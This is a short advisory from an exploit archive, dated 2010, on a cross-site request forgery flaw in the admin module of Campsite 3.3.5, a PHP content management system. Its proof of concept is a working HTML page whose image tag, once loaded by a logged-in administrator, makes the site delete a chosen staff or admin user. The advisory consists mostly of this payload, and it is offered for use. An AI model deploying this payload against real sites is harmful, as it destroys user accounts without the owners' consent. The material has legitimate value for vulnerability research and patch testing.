Campsite v3.3.5 CSRF Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Campsite v3.3.5 CSRF Vulnerability
# Published : 2010-03-10
# Author : Pratul Agrawal
# Previous Title : Joomla Component com_party SQL Injection Vulnerability
# Next Title : Friendly-Tech FriendlyTR69 CPE Remote Management v2.8.9 SQL Injection Vulnerability

=======================================================================
   
                                         campsite 3.3.5 CSRF Vulnerability
 
                     =======================================================================
   
                                                     by
   
                                                Pratul Agrawal
 
   
   
  # Vulnerability found in- Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal

  # Category  	  CMS / Portals
  
  # Site p4ge     http://wwwcampware.org/
  
  # Plateform     php
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://server/admin/login.php
  
 
  Script to delete the Admin user through Cross Site request forgery
  
             .  ..................................................................................................................
  
                        <html>
  
                          <body>
  
                           <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
  
                          </body>
  
                        </html>
  
  
             .  ..................................................................................................................
  
  
  
  After execution refresh the page and u can see that user having giving ID  get deleted automatically.
 
 
#If you have any questions, comments, or concerns, feel free to contact me.